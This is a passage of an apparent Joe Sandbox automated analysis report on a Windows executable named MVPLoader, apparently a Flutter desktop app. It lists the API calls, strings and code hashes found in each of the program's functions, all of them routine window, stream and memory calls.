                                                    • Part of subcall function 00007FF7605B36B0: ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B385D
                                                    • Part of subcall function 00007FF7605B36B0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3869
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEAA_J_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3896
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB4FB
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB783
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@D@std@@@2@V01@@$?rdbuf@?$basic_ios@V?$basic_streambuf@$?width@ios_base@std@@$_invalid_parameter_noinfo_noreturn$?fill@?$basic_ios@?good@ios_base@std@@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?tie@?$basic_ios@Osfx@?$basic_ostream@V12@V?$basic_ostream@
                                                  • String ID: 8$Invalid method call; method name is not a string.$Invalid read in StandardCodecByteStreamReader
                                                  • API String ID: 3362644652-1875019175
                                                  • Opcode ID: 858b82274841d3921d3b5099471afac36d5d179b454d2ea0f45b8ca54881f804
                                                  • Instruction ID: fd357de83b16eabb07286ac34276826760dcb28bd44883d97024b02615ba0e13
                                                  • Opcode Fuzzy Hash: 858b82274841d3921d3b5099471afac36d5d179b454d2ea0f45b8ca54881f804
                                                  • Instruction Fuzzy Hash: F212B622A08B46D5EB10EF25E4A0ABDA361FB45794F904532EA5D03B9ADFBCF544C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: ClassHandleLoadModuleMonitorWindow$CreateCursorDesktopDestroyFlutterFromIconPointRegisterUnregistermalloc
                                                  • String ID: FLUTTER_RUNNER_WIN32_WINDOW
                                                  • API String ID: 202201499-3066883769
                                                  • Opcode ID: 84abeec013650833e230725520de61a20853b7e9b09ba42b834cd101df5714b8
                                                  • Instruction ID: 95628ba14ec9bd5e31e3be927783c606e59127f65faed6e4bf8c2e67110803a5
                                                  • Opcode Fuzzy Hash: 84abeec013650833e230725520de61a20853b7e9b09ba42b834cd101df5714b8
                                                  • Instruction Fuzzy Hash: 5C51B336A18B81C6D711EB25F450A6AF3A4FB59B80F508235EA8E53B16EF3CF451CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Window$ClassClientDestroyFocusMessageMovePostProcQuitRectUnregister
                                                  • String ID: FLUTTER_RUNNER_WIN32_WINDOW
                                                  • API String ID: 1375901799-3066883769
                                                  • Opcode ID: 9c649c9cbd073284af6d405f5f6c730b8bba256f1b1402533a2745904b5a5647
                                                  • Instruction ID: 01277abd2af0207955040f77b2236f19603ee7dfc975889ed990d24ebabcaaf2
                                                  • Opcode Fuzzy Hash: 9c649c9cbd073284af6d405f5f6c730b8bba256f1b1402533a2745904b5a5647
                                                  • Instruction Fuzzy Hash: 8841403AA08652C7EB64EB69E864939E760FF84B84F944135D94E53B66CF3CF841C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: MonitorWindow$#413AreaClientCursorExtendFrameFromInfoIntoPoint
                                                  • String ID: #$(
                                                  • API String ID: 991232836-18311415
                                                  • Opcode ID: 834f147fc7f295a2fc31e987ba63641220d60bb18e14685c497cd3b2570b0969
                                                  • Instruction ID: 55e24fb4d11ac568c934370a0d5eb7096a8c509261befabfd8f3e757e9d69fad
                                                  • Opcode Fuzzy Hash: 834f147fc7f295a2fc31e987ba63641220d60bb18e14685c497cd3b2570b0969
                                                  • Instruction Fuzzy Hash: F2318136A18752C7E710DF29A854A3AF760FBC4744F944238EA8942B55DF7CF4858F20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CurrentHookLibraryLoadThreadWindows
                                                  • String ID: GetDpiForWindow$GetSystemMetricsForDpi$User32.dll
                                                  • API String ID: 3725222763-1451904415
                                                  • Opcode ID: 399307811642ed9edfd4f17f20c750e77d229c18de5923f9e3a7f8a20eea400c
                                                  • Instruction ID: 04dbf497e5b723400dd58be81c9c1639e14223add0280cd3c6096e11c0eb9bef
                                                  • Opcode Fuzzy Hash: 399307811642ed9edfd4f17f20c750e77d229c18de5923f9e3a7f8a20eea400c
                                                  • Instruction Fuzzy Hash: 3901A97994AB06C2EB04BB54E868A70B3A0BF48740FC44438C80E02362EF7CB1C8C730
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: Monitor$FromInfoWindowceil$#413Zoomed
                                                  • String ID: (
                                                  • API String ID: 1964112077-3887548279
                                                  • Opcode ID: 84698f5d985a22cc159a5522ac69392625145164d3497d0927948a72032b96b1
                                                  • Instruction ID: fb78b6bd94edb47a1d70c9621f11bc3316bc4ee5be503ec4c0e518f143d520c0
                                                  • Opcode Fuzzy Hash: 84698f5d985a22cc159a5522ac69392625145164d3497d0927948a72032b96b1
                                                  • Instruction Fuzzy Hash: 75516C76D19741DBEB14AF259660969F3A0FFA8784B40823AD74953B42EB3CF4A1CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Similarity
                                                  • API ID: memmove$_invalid_parameter_noinfo_noreturnmalloc
                                                  • String ID:
                                                  • API String ID: 1886930152-0
                                                  • Opcode ID: f8c63339b67035a4540b22e413aef9cae8443001fe3780622079061f9c36a7b7
                                                  • Instruction ID: 18f483beabaec21b08f807aa6bcca2f728a314a247528f893b34f9ae544b702b
                                                  • Opcode Fuzzy Hash: f8c63339b67035a4540b22e413aef9cae8443001fe3780622079061f9c36a7b7
                                                  • Instruction Fuzzy Hash: AC410322B09B85C5EC10BB66A9249B9EB84EB45FD0FA44635DE5D17B87DF3CF0419320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00007FF7605B1EC0: memcpy.VCRUNTIME140 ref: 00007FF7605B1D3E
                                                    • Part of subcall function 00007FF7605B1EC0: memcpy.VCRUNTIME140 ref: 00007FF7605B1D4E
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B2017
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B20E3
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B21AD
                                                  Strings
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                  • String ID: \app.so$\flutter_assets$\icudtl.dat
                                                  • API String ID: 3063020102-2635820779
                                                  • Opcode ID: 706a4e8c293e4db1b5d8b93a98cd19a69e8d18fc85ba348d5ed7e0e34e014eae
                                                  • Instruction ID: 46916b524eadbdce34c94349c2e36fbd7a5a31be0a6c3e902f8d531b54fb3df0
                                                  • Opcode Fuzzy Hash: 706a4e8c293e4db1b5d8b93a98cd19a69e8d18fc85ba348d5ed7e0e34e014eae
                                                  • Instruction Fuzzy Hash: 6891A262A04B81C1EA10EF28E45476DB3A1EB54B98F909631DB9C07BA6DF7DF5D0C360
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Similarity
                                                  • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_release_startup_lock_cexit_exit_get_wide_winmain_command_line_register_thread_local_exe_atexit_callback
                                                  • String ID:
                                                  • API String ID: 2671446237-0
                                                  • Opcode ID: bfb1cc5b263228ccf1b01a407c993b066369669872a1c4ebac50bac5ccaf90a1
                                                  • Instruction ID: 2b492cbefa890bd456df95bc526324a38ac955e0d212035341495f8d9fba65fd
                                                  • Opcode Fuzzy Hash: bfb1cc5b263228ccf1b01a407c993b066369669872a1c4ebac50bac5ccaf90a1
                                                  • Instruction Fuzzy Hash: B131F125E0D642C1EA24BB689471BB9A391AF41744FD85478EA0E0B3E3FF2CB8448631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • Error: Response can be set only once. Ignoring duplicate response., xrefs: 00007FF7605B5534
                                                  Similarity
                                                  • API ID: DesktopFlutterMessenger$V01@$??6?$basic_ostream@AvailableD@std@@@std@@LockU?$char_traits@UnlockV01@@
                                                  • String ID: Error: Response can be set only once. Ignoring duplicate response.
                                                  • API String ID: 887895033-3377123316
                                                  • Opcode ID: e2e803bbc3e9bcba1f5c5f3eb275a2e46785122a8a0381872556caf083701f6c
                                                  • Instruction ID: e349cb0abb0827f667f7cdb1e3068d62b2320e3c618880d16f1a593c8cd10b81
                                                  • Opcode Fuzzy Hash: e2e803bbc3e9bcba1f5c5f3eb275a2e46785122a8a0381872556caf083701f6c
                                                  • Instruction Fuzzy Hash: 38110739A08A42D2EA14AF16F860A69A365FB89BC1F984035DE8D13766DF3CF555C320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memcmp.VCRUNTIME140 ref: 00007FF7605B78C9
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                    • Part of subcall function 00007FF7605BD450: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7605BD480
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B7A0E
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B7A65
                                                  Strings
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskmallocmemcmp
                                                  • String ID: ILED$dragAppWindow
                                                  • API String ID: 2388763519-1034066609
                                                  • Opcode ID: b7937625da5327750bed1ccc6daafe8a5b5d7a689ab888daba2e7af49442aaea
                                                  • Instruction ID: f7afedd542630a6b01bebc4d690e78c3eee0da01b02ad75eceefe2a040469740
                                                  • Opcode Fuzzy Hash: b7937625da5327750bed1ccc6daafe8a5b5d7a689ab888daba2e7af49442aaea
                                                  • Instruction Fuzzy Hash: 6051BE32A08B86C1EB10AB24E46476EB761EBC5B94F604235EA9D077A6DF7CF584C710
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FlutterDesktopTextureRegistrarRegisterExternalTexture.FLUTTER_WINDOWS ref: 00007FF7605B4ED4
                                                  • FlutterDesktopTextureRegistrarRegisterExternalTexture.FLUTTER_WINDOWS ref: 00007FF7605B4F1B
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605B4F43
                                                  Strings
                                                  Similarity
                                                  • API ID: Texture$DesktopExternalFlutterRegisterRegistrarV01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@
                                                  • String ID: $Attempting to register unknown texture variant.
                                                  • API String ID: 239970561-1905582426
                                                  • Opcode ID: bf5d2c287644e20a180a50225191efd9c2aa22ca14b639a8c48350afb347ee43
                                                  • Instruction ID: 4a1e21a2d6cec3f7da41af3820c9c51f430d6605779ab384ae69da97b0373748
                                                  • Opcode Fuzzy Hash: bf5d2c287644e20a180a50225191efd9c2aa22ca14b639a8c48350afb347ee43
                                                  • Instruction Fuzzy Hash: 9611D2B6D19B81C6EB20EB18E450A29B3A5FB84798FD01231E69C02756DF3CF564CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: LongWindow$#413Prop
                                                  • String ID: BitsDojoWindow
                                                  • API String ID: 1553527160-2907840716
                                                  • Opcode ID: ad7349f382d27030d0bd16a0785658698f89cf82e899d87a712ba028da5df37a
                                                  • Instruction ID: ca1186103be7adda2c9960067627cd90e5d3fbf8a3f637e0ac40c443521e9e52
                                                  • Opcode Fuzzy Hash: ad7349f382d27030d0bd16a0785658698f89cf82e899d87a712ba028da5df37a
                                                  • Instruction Fuzzy Hash: 69F05E19B08611C2F914AB6AB8206B9A6505F86FF1FD04235DD1A07BE7DF3CB5874B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B8CAE
                                                    • Part of subcall function 00007FF7605BD450: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7605BD480
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B8C0E
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                  • memset.VCRUNTIME140 ref: 00007FF7605B8C2B
                                                  • memmove.VCRUNTIME140 ref: 00007FF7605B8CD8
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskmallocmemmovememset
                                                  • String ID:
                                                  • API String ID: 2876229200-0
                                                  • Opcode ID: 11419a21aab2b33d509510eeca921c8d4fb18a97e6358e74509ee06dc945f7da
                                                  • Instruction ID: 31be137e8019273511040c5bce40c1e7590944f5d0697930b1164e52c2b746b3
                                                  • Opcode Fuzzy Hash: 11419a21aab2b33d509510eeca921c8d4fb18a97e6358e74509ee06dc945f7da
                                                  • Instruction Fuzzy Hash: 8051E532A09B82C5EA54EB11E464AB9A650FB44BE0F985631DE6D077CADF7CF440C320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memmove.VCRUNTIME140(?,?,00000000,?,00007FF7605B3BC4,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7605B3A14
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,00007FF7605B3BC4,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7605B3A87
                                                  • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140(?,?,?,?,?,?,?,?,00007FF7605B3BC4), ref: 00007FF7605B3AB5
                                                  • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140(?,?,?,?,?,?,?,?,00007FF7605B3BC4), ref: 00007FF7605B3AC1
                                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,00007FF7605B3BC4), ref: 00007FF7605B3ACA
                                                  Similarity
                                                  • API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@_invalid_parameter_noinfo_noreturnmallocmemmove
                                                  • String ID:
                                                  • API String ID: 3447717424-0
                                                  • Opcode ID: 4ba63e3f9a8b516ddc4949d04df38554ad46262ec499eca850adab24e4e0bbfd
                                                  • Instruction ID: b63c53fce407da8a5df8c260d91c87c52c67646f68440a2b260cb3a8c50d97ea
                                                  • Opcode Fuzzy Hash: 4ba63e3f9a8b516ddc4949d04df38554ad46262ec499eca850adab24e4e0bbfd
                                                  • Instruction Fuzzy Hash: F041B022B04A86C2EA04EB26D4645BDA360EB08BE4F948635DAAD177D6DF7CF095C310
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B357C
                                                  • FileSelectorWindowsRegisterWithRegistrar.FILE_SELECTOR_WINDOWS_PLUGIN ref: 00007FF7605B35FA
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B3635
                                                  Strings
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileRegisterRegistrarSelectorWindowsWithmalloc
                                                  • String ID: ugin
                                                  • API String ID: 1598008650-772329126
                                                  • Opcode ID: a3109c6b281ca9dc55887e694caa2dcee3b1e13e7b3718006fd36f1c05c90ea7
                                                  • Instruction ID: 9b2b30c493cd1cadfe2d371927c36162797eacdeb3abf9fd23ba1c9cae29d7ca
                                                  • Opcode Fuzzy Hash: a3109c6b281ca9dc55887e694caa2dcee3b1e13e7b3718006fd36f1c05c90ea7
                                                  • Instruction Fuzzy Hash: 59414172A18B86C2EB10AB24E45477AB761FB89794F405335EA9D07796DF7CF180C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                  • FlutterDesktopViewControllerCreate.FLUTTER_WINDOWS(?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B4025
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B4051
                                                    • Part of subcall function 00007FF7605B3AE0: FlutterDesktopEngineCreate.FLUTTER_WINDOWS(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF7605B3FF9), ref: 00007FF7605B3BF7
                                                    • Part of subcall function 00007FF7605B3AE0: FlutterDesktopEngineGetMessenger.FLUTTER_WINDOWS(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF7605B3FF9), ref: 00007FF7605B3C04
                                                  • FlutterDesktopViewControllerGetView.FLUTTER_WINDOWS(?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B405C
                                                    • Part of subcall function 00007FF7605BD450: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7605BD480
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Similarity
                                                  • API ID: DesktopFlutter$View$ControllerCreateEngineV01@$??6?$basic_ostream@Concurrency::cancel_current_taskD@std@@@std@@MessengerU?$char_traits@V01@@malloc
                                                  • String ID: Failed to create view controller.
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: #410HookUnhookWindows
                                                  • String ID: FLUTTERVIEW$FLUTTER_RUNNER_WIN32_WINDOW
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: AttributeValueWindow
                                                  • String ID: AppsUseLightTheme$Software\Microsoft\Windows\CurrentVersion\Themes\Personalize
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Similarity
                                                  • API ID: Xbad_function_call@std@@
                                                  • String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000008,?,00000001,00000000,00007FF7605B2AED), ref: 00007FF7605B2C5A
                                                  • WideCharToMultiByte.KERNEL32 ref: 00007FF7605B2D26
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B2D78
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Similarity
                                                  • API ID: memcpy$_invalid_parameter_noinfo_noreturnmemset
                                                  • String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7605B22DD), ref: 00007FF7605B2A80
                                                  • CommandLineToArgvW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7605B22DD), ref: 00007FF7605B2A8E
                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7605B22DD), ref: 00007FF7605B2B8F
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7605B22DD), ref: 00007FF7605B2BCE
                                                  Similarity
                                                  • API ID: CommandLine$ArgvFreeLocal_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Similarity
                                                  • API ID: ClientZoomed$RectScreen
                                                  • String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Similarity
                                                  • API ID: ClientFocusMoveParentRectWindow
                                                  • String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605B754C
                                                    • Part of subcall function 00007FF7605BD450: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7605BD480
                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 00007FF7605B75F8
                                                  Strings
                                                  • Unable to construct method call from message on channel , xrefs: 00007FF7605B7516
                                                  Similarity
                                                  • API ID: V01@$??6?$basic_ostream@Concurrency::cancel_current_taskD@std@@@std@@U?$char_traits@V01@@Xbad_function_call@std@@malloc
                                                  • String ID: Unable to construct method call from message on channel
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7605BCA2F
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BCA3F
                                                  Strings
                                                  • Unknown type in StandardCodecSerializer::ReadValueOfType: , xrefs: 00007FF7605BCA17
                                                  Similarity
                                                  • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@$V01@@
                                                  • String ID: Unknown type in StandardCodecSerializer::ReadValueOfType:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: Monitor$FromInfoWindow
                                                  • String ID: (
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: ClassDestroyUnregisterWindow
                                                  • String ID: FLUTTER_RUNNER_WIN32_WINDOW
                                                  • API String ID: 3182838500-3066883769
                                                  • Opcode ID: 378128563c1f71c92ebf69bbe3bddbe83e42168acbb65d2d475a9656d712f9e6
                                                  • Instruction ID: f280a34ff2ec4f4eced479c60c9faa6cddede2a6ff269ee7e832728de52eab22
                                                  • Opcode Fuzzy Hash: 378128563c1f71c92ebf69bbe3bddbe83e42168acbb65d2d475a9656d712f9e6
                                                  • Instruction Fuzzy Hash: F1013125A09B06C6FB15BF65D468B75A390AF54B04FC84435CA0E06392DF7CF584C371
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
